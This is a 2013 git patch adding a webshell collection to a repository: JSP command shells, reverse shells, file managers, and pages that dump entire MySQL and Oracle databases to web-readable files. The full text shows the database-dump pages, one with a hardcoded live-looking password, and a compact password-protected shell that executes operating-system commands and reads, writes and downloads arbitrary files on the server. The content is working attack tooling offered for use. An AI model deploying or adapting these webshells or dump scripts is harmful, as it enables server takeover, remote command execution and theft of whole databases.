From 6faad041a050c61903ee5bb75724503690e68347 Mon Sep 17 00:00:00 2001 From: tennc Date: Mon, 22 Jul 2013 08:59:10 +0800 Subject: [PATCH] update jsp --- drag/mysql_jsp脱裤.txt | 89 + drag/oracle_jsp脱裤.txt | 321 +++ jsp/hackk8/JSP/Customize.jsp | 59 + jsp/hackk8/JSP/JSP无组件实现WEB上传.rar | Bin 0 -> 27698 bytes jsp/hackk8/JSP/Java Shell.jsp | 125 ++ jsp/hackk8/JSP/JspWebshell 1.2.jsp | 788 +++++++ jsp/hackk8/JSP/cmdjsp.jsp | 31 + jsp/hackk8/JSP/jsp-reverse.jsp | 90 + jsp/hackk8/JSP/jspspy有屏幕.txt | 2326 +++++++++++++++++++ jsp/hackk8/JSP/minupload.jsp | 48 + jsp/hackk8/JSP/other/download.jsp | 1913 ++++++++++++++++ jsp/hackk8/JSP/other/jspspy.jsp | 2329 ++++++++++++++++++++ jsp/hackk8/JSP/other/jspspy_k8.jsp | 2323 +++++++++++++++++++ jsp/hackk8/JSP/other/thx.jsp | 59 + jsp/hackk8/Struts2下shell兼容性报告_K8.txt | 54 + jsp/hackk8/jsp2/CmdServlet.class | Bin 0 -> 1785 bytes jsp/hackk8/jsp2/CmdServlet.java | 43 + jsp/hackk8/jsp2/ListServlet.class | Bin 0 -> 2377 bytes jsp/hackk8/jsp2/ListServlet.java | 86 + jsp/hackk8/jsp2/UpServlet.class | Bin 0 -> 2072 bytes jsp/hackk8/jsp2/UpServlet.java | 71 + jsp/hackk8/jsp2/browser.jsp | 1802 +++++++++++++++ jsp/hackk8/jsp2/cmd.jsp | 35 + jsp/hackk8/jsp2/cmdjsp.jsp | 32 + jsp/hackk8/jsp2/jsp-reverse.jsp | 91 + jsp/hackk8/jsp2/list.jsp | 77 + jsp/hackk8/jsp2/up.jsp | 162 ++ jsp/hackk8/jsp2/win32/cmd_win32.jsp | 31 + jsp/hackk8/jsp2/win32/up_win32.jsp | 162 ++ 29 files changed, 13147 insertions(+) create mode 100644 drag/mysql_jsp脱裤.txt create mode 100644 drag/oracle_jsp脱裤.txt create mode 100644 jsp/hackk8/JSP/Customize.jsp create mode 100644 jsp/hackk8/JSP/JSP无组件实现WEB上传.rar create mode 100644 jsp/hackk8/JSP/Java Shell.jsp create mode 100644 jsp/hackk8/JSP/JspWebshell 1.2.jsp create mode 100644 jsp/hackk8/JSP/cmdjsp.jsp create mode 100644 jsp/hackk8/JSP/jsp-reverse.jsp create mode 100644 jsp/hackk8/JSP/jspspy有屏幕.txt create mode 100644 jsp/hackk8/JSP/minupload.jsp create mode 100644 jsp/hackk8/JSP/other/download.jsp create mode 100644 jsp/hackk8/JSP/other/jspspy.jsp create mode 100644 jsp/hackk8/JSP/other/jspspy_k8.jsp create mode 100644 jsp/hackk8/JSP/other/thx.jsp create mode 100644 jsp/hackk8/Struts2下shell兼容性报告_K8.txt create mode 100644 jsp/hackk8/jsp2/CmdServlet.class create mode 100644 jsp/hackk8/jsp2/CmdServlet.java create mode 100644 jsp/hackk8/jsp2/ListServlet.class create mode 100644 jsp/hackk8/jsp2/ListServlet.java create mode 100644 jsp/hackk8/jsp2/UpServlet.class create mode 100644 jsp/hackk8/jsp2/UpServlet.java create mode 100644 jsp/hackk8/jsp2/browser.jsp create mode 100644 jsp/hackk8/jsp2/cmd.jsp create mode 100644 jsp/hackk8/jsp2/cmdjsp.jsp create mode 100644 jsp/hackk8/jsp2/jsp-reverse.jsp create mode 100644 jsp/hackk8/jsp2/list.jsp create mode 100644 jsp/hackk8/jsp2/up.jsp create mode 100644 jsp/hackk8/jsp2/win32/cmd_win32.jsp create mode 100644 jsp/hackk8/jsp2/win32/up_win32.jsp diff --git a/drag/mysql_jsp脱裤.txt b/drag/mysql_jsp脱裤.txt new file mode 100644 index 0000000..54ca712 --- /dev/null +++ b/drag/mysql_jsp脱裤.txt @@ -0,0 +1,89 @@ +<%@ page import="java.sql.*" %> +<%@ page import="java.util.*" %> +<%@ page import="java.io.*" %> +<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> +<% +try { + //±¸·ގļ�ľ�¾¶ + String backupDir = "/home/tomcat-oa/webapps/ROOT/video/ab1/"; + String ex=".txt"; + String driver = "com.mysql.jdbc.Driver"; + + String url = "jdbc:mysql://localhost:3306/oa"; + String username = "oa"; + String password = "LOa2(2.DX,v>15^td8nWe!L"; + + Class.forName(driver); + Connection conn = DriverManager.getConnection(url, username, password); + + // Get tables + DatabaseMetaData dmd = conn.getMetaData(); + ResultSet rs = dmd.getTables(null, null, "%", null); + ArrayList tables = new ArrayList(); + while (rs.next()) { + tables.add(rs.getString(3)); + } + rs.close(); + + + + ResultSetMetaData rsmd = null; + Statement stmt = conn.createStatement(); + for (String table : tables) { + + rs = stmt.executeQuery("SHOW CREATE TABLE " + table); + rsmd = rs.getMetaData(); + while (rs.next()) { + /* + * mysql> SHOW CREATE TABLE t\G + *************************** 1. row *************************** + * Table: t + * Create Table: CREATE TABLE t ( + * id int(11) default NULL auto_increment, + * s char(60) default NULL, + * PRIMARY KEY (id) + * ) TYPE=MyISAM + */ + // JDBC is 1-based, Java is not !? +// osw.append(rs.getString(2) + "\n\n"); + } + rs.close(); + + out.println("Dumping data for table " + table + "...
"); + OutputStreamWriter osw = new OutputStreamWriter(new FileOutputStream(backupDir+table+ex), "UTF-8"); + BufferedWriter bw=new BufferedWriter(osw); + rs = stmt.executeQuery("SELECT * FROM " + table); + rsmd = rs.getMetaData(); + while (rs.next()) { + bw.append("INSERT INTO " + table + " VALUES("); + // JDBC is 1-based, Java is not !? + for (int col = 1; col <= rsmd.getColumnCount(); col++) { + bw.append("'"); + if (rs.getString(col) == null) + bw.append(""); + else + bw.append(rs.getString(col)); + if (col == rsmd.getColumnCount()) + bw.append("'"); + else + bw.append("',"); + } + bw.append(");"); + bw.newLine(); + } + bw.flush(); + bw.close(); + osw.close(); + rs.close(); + } + stmt.close(); + + out.println("backup is ok"); + + conn.close(); +} catch (Exception e) { + response.setStatus(200); + e.printStackTrace(); +} +out.println("

finished

"); +%> diff --git a/drag/oracle_jsp脱裤.txt b/drag/oracle_jsp脱裤.txt new file mode 100644 index 0000000..efcd7cd --- /dev/null +++ b/drag/oracle_jsp脱裤.txt @@ -0,0 +1,321 @@ +<%@ page language="java" import="java.util.*" pageEncoding="GBK"%> + +<%@ page import="oracle.jdbc.*"%> + +<%@ page import="java.sql.*" %> + +<%@ page contentType="text/html; charset=GBK" %> + +<%@ page import="java.io.*" %> + +<% + +String path = request.getContextPath(); + +String basePath = request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+path+"/"; + +%> + + + + + + + + + + + + XXOO + + + + + + + + + + + + + + + + + + + + <% + + String url = "http://" + request.getServerName() + ":" + request.getServerPort() + request.getContextPath()+request.getServletPath(); + + Class.forName("oracle.jdbc.driver.OracleDriver").newInstance(); + + ResultSet rs=null; + + ResultSet rs_column=null; + + ResultSet rs_dump=null; + + String oraUrl="jdbc:oracle:thin:@192.168.1.81:1521:db"; + + String oraUser="username"; + + String oraPWD="password"; + + int size=30000; + + try + + { + + DriverManager.registerDriver(new oracle.jdbc.driver.OracleDriver()); + + } + + catch (SQLException e){ + + out.print("filed!!"); + + } + + try + + { + + Connection conn=DriverManager.getConnection(oraUrl,oraUser,oraPWD); + + conn.setAutoCommit(false); + + if (request.getParameter("table") == null || request.getParameter("table").equals("")) + + { + + out.print("xixi...
"); + + Statement stmt=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE); + + rs=stmt.executeQuery("select table_name from all_tables"); + + while(rs.next()) + + { + + out.print("");out.print(rs.getString(1));out.print("
"); + + } + + rs.close(); + + stmt.close(); + + } + + else + + { + + out.print("Current table : "+request.getParameter("table")); + + String sql_count="select count(*) from all_tab_columns where Table_Name='"+request.getParameter("table")+"'"; + + String sql_column="select * from all_tab_columns where Table_Name='"+request.getParameter("table")+"'"; + + String sql_columns_count="select count(*) from "+request.getParameter("table"); + + //String sql_dump="select rownom ro,* from T_SYS_USER"; + + Statement stmt_count=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE); + + Statement stmt_column=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE); + + Statement stmt_columns_count=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE); + + rs=stmt_count.executeQuery(sql_count); + + rs_column=stmt_column.executeQuery(sql_column); + + ResultSet rs_columns_count=null; + + rs_columns_count=stmt_columns_count.executeQuery(sql_columns_count); + + + + conn.commit(); + + int count=0; + + while(rs.next()) + + { + + count=Integer.parseInt(rs.getString(1)); + + //out.print(count); + + } + + int columns_count=0; + + while(rs_columns_count.next()) // Total number of records + + { + + columns_count=Integer.parseInt(rs_columns_count.getString(1)); + + out.print("
The number of records : "+columns_count+"
"); + + } + + //out.print(columns_count); + + int column_num=1; + + //out.print("");out.print(""); + + String sql_dump="select * from (select rownum ro "; //SELECT + + while(rs_column.next()) + + { + + //out.print(rs_column.getString(3));out.print("\r"); + + sql_dump+=","; + + sql_dump+=rs_column.getString(3); + + column_num+=1; + + + + } + + rs_column.close(); + + rs.close(); //close + + stmt_count.close(); + + stmt_column.close(); + + sql_dump+=" from "+request.getParameter("table")+" where rownum<="; + + int mark=0; + + mark=columns_count; + + out.print("


Please download:
"); + + while(true) + + { + + if(mark<=size) //one txt count + + { mark=0; } + + else + + { mark=mark-size; } + + String dump=sql_dump+columns_count+") where ro>="+mark; + + columns_count-=size; + + Statement stmt_dump=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE); + + rs_dump= stmt_dump.executeQuery(dump); + + conn.commit(); + + String filename = request.getRealPath(request.getParameter("table")+"-"+mark+".txt"); + + java.io.File f = new java.io.File(filename); + + if(!f.exists()) + + { f.createNewFile(); } + + try + + { + + PrintWriter pw = new PrintWriter(new FileOutputStream(filename)); + + while(rs_dump.next()) + + { + + column_num=1; + + while(column_num<=count) + + { + + pw.print(rs_dump.getString(column_num)); + + pw.print(","); + + column_num+=1; + + } + + pw.println(""); + + } + + pw.close(); + + } + + catch(IOException e) { + + out.println(e.getMessage()); + + } + + out.println("
"+request.getParameter("table")+"-"+mark+".txt
"); + + if(mark==0) + + { + + rs_dump.close(); + + stmt_dump.close(); + + break; + + } + + } + + } + + conn.close(); + + } catch (SQLException e) + + { + + System.out.println(e.toString()); + + out.print(e.toString()); + + } + + %> + + + + + + diff --git a/jsp/hackk8/JSP/Customize.jsp b/jsp/hackk8/JSP/Customize.jsp new file mode 100644 index 0000000..d3acce2 --- /dev/null +++ b/jsp/hackk8/JSP/Customize.jsp @@ -0,0 +1,59 @@ +<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%> +<%! +String Pwd="k8"; +String EC(String s,String c)throws Exception{return s;}//new String(s.getBytes("ISO-8859-1"),c);} +Connection GC(String s)throws Exception{String[] x=s.trim().split("\r\n");Class.forName(x[0].trim()).newInstance(); +Connection c=DriverManager.getConnection(x[1].trim());if(x.length>2){c.setCatalog(x[2].trim());}return c;} +void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"<-").getBytes(),0,3);os.close();is.close();} +void GG(String s, String d)throws Exception{String h="0123456789ABCDEF";int n;File f=new File(s);f.createNewFile(); +FileOutputStream os=new FileOutputStream(f);for(int i=0;i<% +String cs=request.getParameter("z0")+"";request.setCharacterEncoding(cs);response.setContentType("text/html;charset="+cs); +String Z=EC(request.getParameter(Pwd)+"",cs);String z1=EC(request.getParameter("z1")+"",cs);String z2=EC(request.getParameter("z2")+"",cs); +StringBuffer sb=new StringBuffer("");try{sb.append("->"+"|"); +if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent();sb.append(s+"\t");if(!s.substring(0,1).equals("/")){AA(sb);}} +else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1)))); +while((l=br.readLine())!=null){sb.append(l+"\r\n");}br.close();} +else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1)))); +bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);} +else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");} +else if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else if(Z.equals("L")){LL(z1,z2);sb.append("1");} +else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c); +MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);} +else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs,z1,z2,sb);} +}catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("|"+"<-");out.print(sb.toString()); +%> \ No newline at end of file diff --git a/jsp/hackk8/JSP/JSP无组件实现WEB上传.rar b/jsp/hackk8/JSP/JSP无组件实现WEB上传.rar new file mode 100644 index 0000000000000000000000000000000000000000..f81f6a156d427e68a2400a0bc437da47a3a2ee1d GIT binary patch literal 27698 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 z z8+#}TYkL){t?l=Ob0M&H;Gd7jvgL%vGif*fc_N1ya1l(v2o6kxVe;Q|kGo)9t1xSr zL83$B=;sluSZPZ48H1gXBH=y0%gGT&o*f(%OCD7imJQUha_@3;_SqZ4fIe$timygB zbvc%H#wIm+?=>Ih(931O1eJ|LsmgoDVA_PlMk*iUuyI=j5t9_UCOxdhmFo^WH*_3R zv8!HqO?TTz*kv9_-ksAvU|}<4Y7;Vq2rqv3{bS%XR`)GHUu^$reVX{&6=o=Ou-!P$ zwv3CqZ!+@*sEFj3AjDw0vk&<3F#ipGpi=$f`v=WcSwCU8sGu7CPAeI!qkg6iMn(;Q zJ%}1Ls%mV+MREDV-<+q%)xB~SZDW&mL@sDTL6bLF$7?tgt>0>$yD`kV^|ZqPhlSl8 zGFs+}pih$8izyZm3_9K<0Lm>wz7T_y=fZsNQU$Z(Lon1Y8<9e!_pq!PxmvW_aF0}h z5d%0%ftlAdta1n8-_=W&&Q{td)<{utx^hcxHg3+m>B#8+?v9x8KLl0>m<9v@`1&C+ z&?uRJ=38qlDGm$!{}F*L4O|U=_{&&=PWvVdO)p(9Xi{Y6LFSaNg?Lj0swSnvWkF>J zkF_!}4roRdgDGap$382O`h02PTaUmveoPqy*EslRZzXi8fTDpWsLEAv$HR!XvfHE*Bk@ud~K~!|Aw-!tND>$ zb-s)W7g^l?9885xPD6}K>jinbG6MIio}wau9|Igm4X|cpO8T~FkSoOoAcQ+JI^8Bc5xMbVlcI3N(axvCS6;diQ|+9-Ut;O)_b6)T;BIe+ye zd!kZlnnIyY5;)$=)g!CCeG*z6 z&n)};m@MM1ygGU8(8(tDqnaFTt^H6d#JeF9k0%*!F#O%t3bGdjgqZfLWbb zY@F@H-mnGGyRz|Rbr%rR)5+}yRx8^m+Zda(Eo6&0{BA*sn>E`ORws)D*MZp{U-k#k z4eU-PuUtwjF4BH~CwmRr5np4_Yw7JC)@Sry<`7$qU6w6F%h4U|LG_d%pLfapI9pnv z+)-}eLGGN#2yv@aYRd4I2M>sq6P=t0fNuh~_k(pOOUVq|Y=Br9aHounqj;v zxt>_OTTfqHmy66>agbL&Ou+9$%9ZUb(;$sng=#DmFL)iOUi5U z6JY0S57*26V-QT)u(IV@G?ap{rlC z%P2OT35WiOVD2w%UIhk{504Ni##79$=aJ1%V7xkHk;RSG%^S5`>lIQbVpp*lX@nLu z=*M~%i?Q;g*(5RzwpsOGgDFoj7x9Jn3g)*L0@3S>5thfU)CkV+(l}NQi+X)ZogGWI z)wu9pjY|S<&fKgM2d#gX8zbAli}k$_VGxI+{j@i9qcT=5eM8#n?ebPGSPbRD3vka` ztWt~C8v*=oG8X*RRL`5RaNzPVjeiAK)yvc^FP)?>Pz(c)<7fMtKEf#3$g~@(#Z|R= zLA0mwsI4mD)Vy*1NgX z*VP*$Z)*$QBye^%i?Oz#iY8y#RokKlUM(sU;SdW~&Te()8wjWLB4_IqhM&1of(c#a ziCl}P(N*i_7&vp=YXZ(2{n_S9C4V&{$Iv8Ki&CHSJB}52Iimb-X&tXsU`c{gc{Y*+=s&ywO~UI+VFrehfVl>*@pz# z4mA9aJpu*`15J3XsHb8 z@<+Sdoj5Www#79*@U$1K2#n3YM+kzKrI;9E<-&%I<~Ow3&(c8$cc-*|nXWHz?r2f$ z1LbN71bRP0bT^42RpSoQ)S~mVSOTtZkmVq>V{G=}OHv6CHq&m^Suf=B6UQA_=n4TG z>GM_sy;pSFU<3$xm0}Z@UJWaZO~t3iPgPHO->H92h`6Bw=H{Ki69**^tJp>}+ucmv zQQn*$5P|`7O5L%J?gFOiz89Y4X3@DOo)(6cCi9&^RmfAt)C8-OwQ=biajR<*G4^YQ6XBmYtYj zf<0L!!O9Hwj0qWCL9wVDm>BcoZ$6qFxXbS}S0zve&+u^MmJoA$rC(z^N6e|lR{m*= zny?urn!=-diV(Po;Ece=6Qz{;cORyN(h28~=^og={h;iILs@rf;2g|pq1z3_bn|Ir zkonySt=tsPX%Yvjhg^_U%+NaBsd5j*2;^QPMkwJ}nKySLsr5_ibu(3X@VdmI4yNOf z5dm~(=TarjE>A5+o1z}zYz&4XoyH9DLB3r?`$0oPGB`>6e}s8!JfDZLxdT1OvI0HC zK%5C8Ev0jEFC_c*1?^U%eCByHvs=gr)+`y)t` z>sN}W(yJq$qFs+xG6l!by~3@vKLn2pES)2qL`x8G$AdyOcRP@ZO!GMF*u#K4TWf4T z_|42Mc4S?jI&kU`P}?FLS%HiL^t+{}%qF^xTrJ1Tfp>&g-pd2Lej3#Wm!X7VpfqU7 zJy}N5#MTwaXz+-?+#w+@sd?x(K&wfy_G-N;YzCV+8AL1K3Ft^FF6c2UT4kI_&>%UYK)moSd>%QuW?(mMn>FeJ9l+m)&7 z4)ro#_FRlQsSR1*7qUn=1@@tFI&ll=(prGkAS$ubC<9DK2-5nup=4Lwss=^p)5g5~ zr2#_f@jrzwLUE0-N;JM@#T6OzZ0BqcfIKiX94uMpWyZ{d-h>-ngKy*(4w5jGE*K)V z(2roPY;1IEt!^~foZPJGGNjkvBvT`$CQ6jll>RQoFgcx$1O)S8aFnKM2%;Q#V2hv5 zTXl%2;o=O+KSf`K&Ok7_WodXoTk%}AVu6-9x82Xf?2}S4AQBB*D=BmzF6j}ZE35+P$XM<+5|&Z zQ{B2+S|r8ckt6gsuUj(!cn$i?D`B_ZZk5^`4uKGaz;d*LW=KyFbs8_lZkyXZj@nTX zIgf=BGLAiuC!447STxD9Vqw@;gdD;+>FTD2I%;DqL8hjAOBtCWCy1YkiTJP|h#jhi z`m%~)`XY{OhUkVp`rpM4q-=~viqS;_QJ>$|$Rn!cds?<+oN?|%m&QWW>S7GMfHJzlFp2<*Zt*S&2U!P3 zL_UdvXNG{uH;zcnpdI}-a^1dyKq2}SMT5m5qn?3WfBD=6A>-crZWfpsNbjPFT5d-E z0jox-<83OI8$qOENXQA57uYTkenq%Lfn!>f&@q2{hiUUl_bNSSj3Hl@5#0{fukcc< zaMj*HprN8tCMXrMmZ74)N5ON9QR|jTAiuA1*5O81Grd3o7!aem(Y)G`x4H2KXOC?~ z48C4;@z4;5G!v~qyQTA$xpvN3g>qt8iamo5Yz&buEqCmJs$#STh>M0;OOg?u$owkS z149nEVAvh1Vz#}~qbzX0mjEL-<6GwOD_m5pHtC3ZyKK|`4kt@lquM-cd9ZsgfU^$g zo9vgrFPyp8nNH)(Stj#!;mJ~D zO`i}E)tTJ`L-VvStIWK~HncRGs`CB(p1w2X19%+)P!)@g)1U+egl;@j8hT=+KO2 zJ69+XF)l5)u{y}%0K1D~5vvp}BdN~v#>_?S^0=`K(R?GDmf-TpecdAq7%tA{%jNhA ze|>~|D>+`$z${6Ovh?kA(R^*?f3n#iI^?#LGr9!iy@oZym9Sy7}9l##AofG%@eXojGycFIwUbAD0 zj?6?=!z2&^vtra=2nA3EB|inHePSNSjj3M_D{j_b0!ywQl0`G@_9QGsI4ug_fM@%d z0^jndA!aZim$*1Czu>@sNq2Z&Y>$Wc$K<#|BpqNx#&hR=6Ga4{HlPRr_-^q9>;wDu z|DdtQoG-_dW{b=(RL|r?w0PtO>v?dOs$YE)3S5Q9sp7f?kMLcOt-c*NARziC_~uus z%v+RUY(`cNJ1UbqoD*Q%ANRITg6km#u9f2vp1S2OIAu&A5Z?7EDj)@;a}xmkHk)i0 zlk_keha7O~f9E<0VF1D3`@_K(grNP)5t~4&gJlNiz~Jf+{0Lssllx~u%Eu&bWPjx( zwFircWDKi?Hc{9C#ahMRV2*hN@zeEYEoTD|_;Ec9T4%vJ6J{&0< z`14_eQQ`L|YeX!dM^8xZivm^TS!>-4mY27C;7F6x%w z?wt)_r?6}HODJxIW75Q*W!Ro2|7Og-AX_wKQCJZZO?OmUXh~1n3Gu)vlfnHM-uBQ; zC3UoJl(v6UrKB{5cYI_dBZf^YOW>JU7>z~B;Ex>Cxe&-?8^@KEwB&d{1<6J#Q>t^x z($?70KbPo{z6%*FK;&2E8!I^Q%=WYI(Fm*zebpjy!|`Mhlf(4)n&)kM0Gla@tZ>Q4 z1F}?T9~!!-I2(p>6j2ZIBx;X&tils@4`>eeRE4scQy!a?4BwpFW|F0=WSGTX`Wwzu zq7ln6m!r{zBzpO_02dW}TE<1_r0gnw^!MZm))>;IQsPuHpNbmCKIhT2$OsAor%KjE zFWQSYI6Cmi;KSQmJ(_OTg0BLjInc);#ev?6Urq*AJXb~xNHsOA6K&zI^5NjK&lG#@ zau)=N+itwc-|!Nnq8u6e3FUK#5MqaH7&_9)ICMS5zelQ0`_Pq4$C@^2*RFkMGAj*< zGf%=+Fa3L6Ub9~Y+atITt#U)C8~d?U5O@t@-7Q*y&ygm6JAMGqz?=St8+;QnLT?C> zpL+QlA-hSbv*XDm z))C#a5RJlj6LDo37>ysp1?3tf6}^m$snaRJ26(k?YLBE8rEk_DXV9c&5Y+WVS$V9$ z`gG&0mgZ7jWf*+!(NlL5Wp#V9Db(fUbx$(tUO<-6hDlqxezP1tO4QJ;kV)(H$>w%1 zq(BKYO-f79AfrK*f%_KGp567%;h@jgLltxL6prARA0j~?@M@KDlhP&7LBuH9OUKgd ze4I+yKMje3?XniSXCOG$7^A!M^!6Q4s5kHhOxO#;x_zUK?N6uPhu&$#L2$hjd@LCY zY3jA$&CChZ(=EWCSzfg%C9AuAhp>hMJ(eAZb1Vzev3PuhtCp8zcgy!XRGek0{Zk@|ceq%8eZ zFzDi!;aqhTZiN-Wx}nzBeIY9y!dPt-Il+?9G4oR+wt~z|RZMh@FfYdD-9<^WyMS`w)S=MIl4W9M6tirxcWylI{E? z{XzqI**VEh`W1eM_M3~HFtHJqf=hoXv02~H4bWcpfF0yjU?avCgI$6d!_~`h-B(#M zRlDcHZ*LDrBS&)q40^lf<3uhZ&Zpx?X52dvBUjNKzQU834LKH zx~#-mtAIhBixKEJt?_ZhoM3Fop8NoQCo!@%{DTK~TpZy`I$1i#k^=*gPdKrs+Mr*l z$TZ<=oQ19`DSxF!FQ<5dyO>nkKHl~;-k){DVeA)dUAuMd& z;ES}%JOK;f4SaCneGfsyQF2b8Q;DWJfYf3K@%DVgI;YOUFa0?+GzRE=;>kv>kRaq6 zEE?GCh3zD!nC*WXDhn@VmZDru!y{2Nwj;}mR|Yh{8_3v$xGA&10eB7ut~g=yzL1b# zZVS*}k=Fl zl{!=^wOJ4J3K&`UMD05S*^qn^EgVYWb0)Q0=kR7ZY;JKbwHG$rn>h`~o7R$4!bLwIy*Gg_#GgnieZwsj?uvaU;#ZzsxlrC33AoTL7zNHQ-qNlT-aeZjF+ zoWu3(iZY(w{Y*CR@B>zgbEexyV#vh`t-Y63!0asZ9K^%NL9x5mvyWBVj4O+76UM>! zMgi?QSir}B0_{drqCZpmwon$`$2FTr+Ha?H3^AL8I!>XmTlq@+{V-dI@mTd``KnBM z3@Ni}54P{byNFOxebSRk{gj8J5$lza>a}N4aqz@h0GGX+bNU41=36|~uap7w^Eb1e zIU~tuUzcA8W6{%KZ`Xm5{jnjz#%bMg1!A6fV<2^ld_p$K7e1rJDNW1~d{=E*Oi6xj 